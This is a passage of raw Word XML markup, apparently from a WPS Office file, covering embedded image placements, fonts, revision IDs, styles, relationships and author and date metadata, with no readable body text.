          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8D963D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5755640" cy="1568450"/>
            <wp:effectExtent l="0" t="0" r="5080" b="1270"/>
            <wp:docPr id="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3"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId38"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5755640" cy="1568450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CBA5B7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="vi-VN" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5753100" cy="1213485"/>
            <wp:effectExtent l="0" t="0" r="7620" b="5715"/>
            <wp:docPr id="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4"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId39"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5753100" cy="1213485"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkStart w:id="34" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId3" w:type="default"/>
      <w:footerReference r:id="rId4" w:type="default"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1417" w:right="1134" w:bottom="1417" w:left="1701" w:header="720" w:footer="720" w:gutter="0"/>
      <w:pgBorders w:display="firstPage">
        <w:top w:val="none" w:sz="0" w:space="0"/>
        <w:left w:val="none" w:sz="0" w:space="0"/>
        <w:bottom w:val="none" w:sz="0" w:space="0"/>
        <w:right w:val="none" w:sz="0" w:space="0"/>
      </w:pgBorders>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BoldMT">
    <w:altName w:val="Segoe Print"/>
    <w:panose1 w:val="00000000000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="00000000" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Courier">
    <w:altName w:val="Courier New"/>
    <w:panose1 w:val="00000000000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="00000000" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Google Sans">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5C057">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E8E6C">
                          <w:pPr>
                            <w:pStyle w:val="8"/>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  \* MERGEFORMAT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354E8E6C">
                    <w:pPr>
                      <w:pStyle w:val="8"/>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  \* MERGEFORMAT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p>
                </w:txbxContent>
              </v:textbox>
            </v:shape>
          </w:pict>
        </mc:Fallback>
      </mc:AlternateContent>
    </w:r>
  </w:p>
  <w:p w14:paraId="5638D5D1">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884BC">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356D46"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="24356D4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401543"/>
    <w:rsid w:val="0195331C"/>
    <w:rsid w:val="01BD37E0"/>
    <w:rsid w:val="046A7C70"/>
    <w:rsid w:val="06B61F38"/>
    <w:rsid w:val="06D147E3"/>
    <w:rsid w:val="07540A9E"/>
    <w:rsid w:val="097C336B"/>
    <w:rsid w:val="0A037049"/>
    <w:rsid w:val="0A320D47"/>
    <w:rsid w:val="0AB8356D"/>
    <w:rsid w:val="0B200B9C"/>
    <w:rsid w:val="0C432A82"/>
    <w:rsid w:val="0E134CB7"/>
    <w:rsid w:val="0FCB77DB"/>
    <w:rsid w:val="10480942"/>
    <w:rsid w:val="11C7394D"/>
    <w:rsid w:val="12DF0704"/>
    <w:rsid w:val="14020781"/>
    <w:rsid w:val="15122288"/>
    <w:rsid w:val="15404496"/>
    <w:rsid w:val="157C1125"/>
    <w:rsid w:val="18EB0A23"/>
    <w:rsid w:val="19D5776B"/>
    <w:rsid w:val="19E85BD9"/>
    <w:rsid w:val="1A455F21"/>
    <w:rsid w:val="1AD10211"/>
    <w:rsid w:val="1AD93C19"/>
    <w:rsid w:val="1B1A58C1"/>
    <w:rsid w:val="1B7B3D86"/>
    <w:rsid w:val="1CB02232"/>
    <w:rsid w:val="1D1F5F4B"/>
    <w:rsid w:val="1D5906AA"/>
    <w:rsid w:val="1FD62D47"/>
    <w:rsid w:val="1FF93F6C"/>
    <w:rsid w:val="207F1D4E"/>
    <w:rsid w:val="20DD0798"/>
    <w:rsid w:val="241F6E5A"/>
    <w:rsid w:val="2442737B"/>
    <w:rsid w:val="247A0F48"/>
    <w:rsid w:val="24D42AFB"/>
    <w:rsid w:val="25780B9A"/>
    <w:rsid w:val="26020467"/>
    <w:rsid w:val="263F58DF"/>
    <w:rsid w:val="264D6D44"/>
    <w:rsid w:val="269B461C"/>
    <w:rsid w:val="271F5342"/>
    <w:rsid w:val="28F43B06"/>
    <w:rsid w:val="2B1D09B9"/>
    <w:rsid w:val="2B417007"/>
    <w:rsid w:val="2DF829F8"/>
    <w:rsid w:val="2F401543"/>
    <w:rsid w:val="2FD73D27"/>
    <w:rsid w:val="308C5D5A"/>
    <w:rsid w:val="309B764B"/>
    <w:rsid w:val="31180ED9"/>
    <w:rsid w:val="317D6DF1"/>
    <w:rsid w:val="32201B04"/>
    <w:rsid w:val="3270063B"/>
    <w:rsid w:val="32C361DE"/>
    <w:rsid w:val="33273795"/>
    <w:rsid w:val="33892165"/>
    <w:rsid w:val="36F76373"/>
    <w:rsid w:val="371A6FDE"/>
    <w:rsid w:val="37932EFB"/>
    <w:rsid w:val="39743651"/>
    <w:rsid w:val="3A2363D7"/>
    <w:rsid w:val="3A267C65"/>
    <w:rsid w:val="3B1021D8"/>
    <w:rsid w:val="3B165C59"/>
    <w:rsid w:val="3D3A2FA3"/>
    <w:rsid w:val="3D6D63F5"/>
    <w:rsid w:val="3D962707"/>
    <w:rsid w:val="3DDA2768"/>
    <w:rsid w:val="3E5317A2"/>
    <w:rsid w:val="3EDD5CEE"/>
    <w:rsid w:val="429B778F"/>
    <w:rsid w:val="43983CBF"/>
    <w:rsid w:val="44231A1E"/>
    <w:rsid w:val="44C2225C"/>
    <w:rsid w:val="45A50B62"/>
    <w:rsid w:val="45D26802"/>
    <w:rsid w:val="461C4716"/>
    <w:rsid w:val="473F4D3C"/>
    <w:rsid w:val="47FA3E9F"/>
    <w:rsid w:val="480F1C53"/>
    <w:rsid w:val="48C356A5"/>
    <w:rsid w:val="49003E49"/>
    <w:rsid w:val="491B7024"/>
    <w:rsid w:val="49E54CA6"/>
    <w:rsid w:val="4B58750B"/>
    <w:rsid w:val="4C256528"/>
    <w:rsid w:val="4E6C740D"/>
    <w:rsid w:val="50B235C2"/>
    <w:rsid w:val="50ED5481"/>
    <w:rsid w:val="51E24F11"/>
    <w:rsid w:val="53311FE7"/>
    <w:rsid w:val="546364B2"/>
    <w:rsid w:val="5468773F"/>
    <w:rsid w:val="54806B7C"/>
    <w:rsid w:val="54B009D3"/>
    <w:rsid w:val="54BB1B13"/>
    <w:rsid w:val="54E335EF"/>
    <w:rsid w:val="55AB6AE9"/>
    <w:rsid w:val="55DE2EA3"/>
    <w:rsid w:val="5605034C"/>
    <w:rsid w:val="564E4D20"/>
    <w:rsid w:val="593226BA"/>
    <w:rsid w:val="5A79327D"/>
    <w:rsid w:val="5AC326B2"/>
    <w:rsid w:val="5BBE19B3"/>
    <w:rsid w:val="5DE064FC"/>
    <w:rsid w:val="5F895059"/>
    <w:rsid w:val="60B15647"/>
    <w:rsid w:val="618465A5"/>
    <w:rsid w:val="63040827"/>
    <w:rsid w:val="65F150F3"/>
    <w:rsid w:val="685B1317"/>
    <w:rsid w:val="696C424B"/>
    <w:rsid w:val="69CD6C2D"/>
    <w:rsid w:val="6A47109C"/>
    <w:rsid w:val="6B442BC4"/>
    <w:rsid w:val="6C4C40FF"/>
    <w:rsid w:val="6C6E3873"/>
    <w:rsid w:val="6CDB4A0D"/>
    <w:rsid w:val="6D176091"/>
    <w:rsid w:val="6E091096"/>
    <w:rsid w:val="6E38442E"/>
    <w:rsid w:val="6F666B28"/>
    <w:rsid w:val="6FB1281F"/>
    <w:rsid w:val="6FCE2DCE"/>
    <w:rsid w:val="703C2093"/>
    <w:rsid w:val="71E63339"/>
    <w:rsid w:val="71F96A05"/>
    <w:rsid w:val="726245AA"/>
    <w:rsid w:val="7431425A"/>
    <w:rsid w:val="74943930"/>
    <w:rsid w:val="751C4460"/>
    <w:rsid w:val="759E1500"/>
    <w:rsid w:val="760F453B"/>
    <w:rsid w:val="768C4D1F"/>
    <w:rsid w:val="77DB77B3"/>
    <w:rsid w:val="78D51C3B"/>
    <w:rsid w:val="79D50499"/>
    <w:rsid w:val="7A144A06"/>
    <w:rsid w:val="7B346EF9"/>
    <w:rsid w:val="7BB57E40"/>
    <w:rsid w:val="7C9337E1"/>
    <w:rsid w:val="7CEE6B6F"/>
    <w:rsid w:val="7D716C3A"/>
    <w:rsid w:val="7D7A2139"/>
    <w:rsid w:val="7DF52C31"/>
    <w:rsid w:val="7ED6527F"/>
    <w:rsid w:val="7F5F3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6"/>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character" w:styleId="11">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="5"/>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 w:type="paragraph" w:customStyle="1" w:styleId="14">
    <w:name w:val="WPSOffice手动目录 1"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:ind w:leftChars="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="15">
    <w:name w:val="WPSOffice手动目录 2"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:ind w:leftChars="200"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="SimSun" w:cs="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="16">
    <w:name w:val="Heading 2 Char"/>
    <w:link w:val="3"/>
    <w:qFormat/>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NULL"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.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10032</Words>
  <Characters>41084</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>0</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>51084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2025-10-10T12:00:00Z</dcterms:created>
  <dc:creator>Linh Phạm Huỳnh Khánh</dc:creator>
  <cp:lastModifiedBy>KHUONG</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-26T12:21:04Z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81BAEF9150D8478F988F42D02D06514D_13</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="KSOTemplateDocerSaveRecord">
    <vt:lpwstr>eyJoZGlkIjoiZmRjMGMwMjNiOGMyNmYzMzQzNTk4Y2RkZjBmY2VhMDAiLCJ1c2VySWQiOiIxMzkyMjg3ODQ3ODMwIn0=</vt:lpwstr>
  </property>
</Properties>
</file>